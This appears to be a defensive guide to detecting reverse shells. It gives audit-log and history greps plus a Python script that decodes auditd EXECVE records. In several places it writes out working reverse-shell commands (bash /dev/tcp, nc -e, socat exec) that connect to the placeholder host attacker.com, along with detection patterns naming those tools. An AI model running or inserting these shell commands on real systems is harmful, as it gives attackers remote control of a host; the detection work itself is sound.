Reverse Shell

Reverse Shell Detection and Analysis
Reverse shells are a common tool in an attacker’s arsenal, enabling remote command execution on compromised systems. This guide explores methods used to establish reverse shells, detection strategies, and forensic analysis techniques.
Common Commands and Their Usage
1. bash Command
The bash command can establish reverse shells by leveraging /dev/tcp or /dev/udp.
Example:
export RHOST=attacker.com
export RPORT=12345
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'
Detection:
Audit Logs:
cat /var/log/audit/audit.log | grep "bash" | egrep "udp|tcp"
Command History:
history | grep "bash" | egrep "udp|tcp"
cat ~/.bash_history | grep "bash" | egrep "udp|tcp"
EDR/XDR Logs: Monitor for bash process creation or network events involving /dev/tcp or /dev/udp.
2. nc (Netcat) Command
Netcat is a versatile utility often used for reverse shells.
Example:
RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORT
Detection:
Focus on the -e or -l parameters.
Audit Logs:
cat /var/log/audit/audit.log | grep "nc" | grep "\-e"
Command History:
history | grep "nc" | grep "\-e"
cat ~/.bash_history | grep "nc" | grep "\-e"
EDR/XDR Logs: Monitor nc process creation and check for unusual outbound connections.
3. socat Command
socat offers more flexibility than nc, making it a preferred choice for advanced reverse shells.
Example:
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
Detection:
Investigate commands using exec and tcp-connect.
Audit Logs:
cat /var/log/audit/audit.log | grep "socat" | grep -i "exec"
Command History:
history | grep "socat" | grep -i "exec"
cat ~/.bash_history | grep "socat" | grep -i "exec"
EDR/XDR Logs: Analyze socat processes for suspicious parameters and unexpected network activity.
General Detection Strategies
1. Audit Logs
Continuously monitor /var/log/audit/audit.log for specific commands and associated parameters:
Commands to Track: bash, nc, socat
Example:
cat /var/log/audit/audit.log | grep [command]
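The grep checks above assume the command line appears in audit.log verbatim, but auditd hex-encodes any EXECVE argument that contains whitespace, a double quote or a non-printable byte, so the payload after bash -c is written as a hex string and a grep for "tcp" never sees it. The following Python script is an added example, not part of the original page: it decodes EXECVE records and applies the bash, nc and socat rules to the decoded command line, using constructed sample records; the ncat/netcat aliases are an assumption beyond the page's nc rule.

```python
import re
# Rules applied to the decoded argv joined with spaces. They mirror the page's greps but
# require the reverse-shell tokens themselves; ncat/netcat aliases are an added assumption.
REVERSE_SHELL_RULES = {
    "bash-devtcp": re.compile(r"^bash\b.*/dev/(tcp|udp)/"),
    "nc-exec": re.compile(r"^(nc|ncat|netcat)\b.*\s-e\s"),
    "socat-exec": re.compile(r"^socat\b(?=.*tcp-connect:)(?=.*exec:)"),
}
# auditd writes argv as aN="plain", or aN=<hex> when the value holds whitespace, a quote or a non-printable byte.
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')

def decode_execve(line):
    """Return argv from one type=EXECVE record (hex args decoded), or None for other records."""
    if "type=EXECVE" not in line:
        return None
    args = {}
    for m in ARG_RE.finditer(line):
        quoted, hexed = m.group(2), m.group(3)
        args[int(m.group(1))] = quoted if quoted is not None else bytes.fromhex(hexed).decode("utf-8", "replace")
    return [args[i] for i in sorted(args)]

def match_rules(argv):
    """Names of the rules that fire on argv; a leading path on argv[0] (/usr/bin/nc) is ignored."""
    cmdline = re.sub(r"^\S*/", "", " ".join(argv))
    return [name for name, rx in REVERSE_SHELL_RULES.items() if rx.search(cmdline)]

def scan_audit_log(text):
    """Return [(rule, decoded command line)] for every EXECVE record that matches a rule."""
    hits = []
    for line in text.splitlines():
        argv = decode_execve(line)
        if argv:
            hits.extend((rule, " ".join(argv)) for rule in match_rules(argv))
    return hits

# Constructed sample audit.log (not from a real host), encoded the way auditd would write it.
def _audit_arg(s):
    return s.encode().hex().upper() if re.search(r'[\s"]', s) or not s.isprintable() else f'"{s}"'

def _execve_record(serial, argv):
    fields = " ".join(f"a{i}={_audit_arg(a)}" for i, a in enumerate(argv))
    return f"type=EXECVE msg=audit(1700000000.000:{serial}): argc={len(argv)} {fields}"

SAMPLE_LOG = "\n".join([
    _execve_record(501, ["bash", "-c", "exec bash -i &>/dev/tcp/attacker.com/12345 <&1"]),
    _execve_record(502, ["nc", "-e", "/bin/sh", "attacker.com", "12345"]),
    _execve_record(503, ["socat", "tcp-connect:attacker.com:12345", "exec:/bin/sh,pty,stderr,setsid,sigint,sane"]),
    _execve_record(504, ["bash", "-c", "cat /proc/net/tcp"]),  # benign: "bash" + "tcp" but no /dev/tcp
])
```

Run scan_audit_log on the real file's contents to get the same (rule, command line) pairs; the benign record shows why matching on the decoded /dev/tcp path beats the plain "bash" and "tcp" greps.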
2. Command History
Regularly inspect command history files for traces of suspicious commands:
Interactive Sessions:
history | grep [command]
Persistent Logs:
cat ~/.bash_history | grep [command]
3. EDR/XDR Solutions
Employ EDR or XDR tools to:
Track Process Creation: Identify the origin of reverse shell tools.
Analyze Network Activity: Monitor outbound connections, especially to uncommon ports or suspicious IP addresses.
4. Network Monitoring
Set up alerts for:
Unusual Outbound Connections: Look for high-frequency requests to external IPs.
Known Malicious Indicators: Monitor outbound traffic to flagged domains or IPs.
Key Takeaways
Reverse shells exploit legitimate utilities like bash, nc, and socat for remote control.
Detection relies on monitoring suspicious process creation, command execution, and network connections.
Forensic Analysis requires correlating data from:
Audit logs (/var/log/audit/audit.log).
Command histories (history or .bash_history).
EDR/XDR telemetry for process and network activity.
By continuously monitoring system activity and analyzing logs for anomalies, defenders can effectively detect and respond to reverse shell threats.